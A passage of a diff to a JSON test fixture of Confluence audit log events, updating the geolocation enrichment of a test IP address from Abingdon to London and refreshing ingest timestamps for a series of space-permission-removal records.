user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6864,20 +6462,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6885,7 +6477,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222500376Z", + "ingested": "2021-12-14T14:34:31.513229923Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.350Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6958,20 +6550,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -6979,7 +6565,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222502251Z", + "ingested": "2021-12-14T14:34:31.513230326Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.342Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7045,20 +6631,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7066,7 +6646,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222504134Z", + "ingested": "2021-12-14T14:34:31.513230710Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.330Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7139,20 +6719,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7160,7 +6734,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222506019Z", + "ingested": "2021-12-14T14:34:31.513231099Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.324Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7233,20 +6807,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7254,7 +6822,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222507911Z", + "ingested": "2021-12-14T14:34:31.513231514Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.311Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7327,20 +6895,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7348,7 +6910,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222509793Z", + "ingested": "2021-12-14T14:34:31.513231953Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.303Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7421,20 +6983,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7442,7 +6998,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222511653Z", + "ingested": "2021-12-14T14:34:31.513232356Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.295Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETPAGEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7515,20 +7071,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7536,7 +7086,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222513672Z", + "ingested": "2021-12-14T14:34:31.513232943Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.290Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7602,20 +7152,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7623,7 +7167,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222515560Z", + "ingested": "2021-12-14T14:34:31.513233387Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.285Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7696,20 +7240,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7717,7 +7255,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222517444Z", + "ingested": "2021-12-14T14:34:31.513234211Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.282Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7790,20 +7328,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7811,7 +7343,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222519323Z", + "ingested": "2021-12-14T14:34:31.513234699Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.278Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7884,20 +7416,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7905,7 +7431,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222521203Z", + "ingested": "2021-12-14T14:34:31.513235091Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.274Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEMAIL\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -7971,20 +7497,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -7992,7 +7512,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222523108Z", + "ingested": "2021-12-14T14:34:31.513235492Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.270Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8065,20 +7585,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8086,7 +7600,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222525013Z", + "ingested": "2021-12-14T14:34:31.513235889Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.266Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8159,20 +7673,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8180,7 +7688,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222526892Z", + "ingested": "2021-12-14T14:34:31.513236287Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.262Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EXPORTSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -8253,20 +7761,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", @@ -8274,7 +7776,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222528780Z", + "ingested": "2021-12-14T14:34:31.513236676Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.258Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission 